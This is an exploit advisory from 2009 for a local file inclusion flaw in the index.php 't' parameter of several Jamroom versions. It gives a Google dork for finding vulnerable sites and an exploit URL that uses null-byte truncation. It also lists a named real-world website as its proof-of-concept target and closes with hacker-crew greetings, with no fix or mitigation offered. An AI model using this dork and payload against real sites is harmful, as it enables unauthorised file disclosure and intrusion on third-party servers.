Jamroom (index.php t) Local File Inclusion Vulnerability

2009-04-14 20:51:49

[o]-----------------------------------------------------------------------------------------------------------------[x]
| Local File Include Vulnerability |
[o]------------------------------------------------------------------------------------[o]
| Software : Jamroom version 3.1.2 , 3.2.3 , 3.2.4 , 3.2.5 , 3.2.6 , 4.0.2 |
| Vendor : www.jamroom.net |
| Date : 12 March 2009 |
| Author : zxvf |
| Contact : [email protected] |
[o]------------------------------------------------------------------------------------[o]

[»] Google Dork

"Powered by Jamroom"

[»] Exploit

http://[site]/index.php?t=[LFI]%00

[»] Proof of Concept

http://www.earplugradio.com//index.php?t=[LFI]%00

[o]------------------------------------------------------------------------------------[x]
| Greetz |
[o]------------------------------------------------------------------------------------[o]
| c0li, OoN_Boy, pizzyroot, H312Y, eminem, xx_user, NoGe |
| Armageddon Team, avatar team, and all indonesian hacker! |
| BeHave oR BeGone !!! |
[o]------------------------------------------------------------------------------------[o]

#

Fixes

No fixes

Per poter inviare un fix è necessario essere utenti registrati.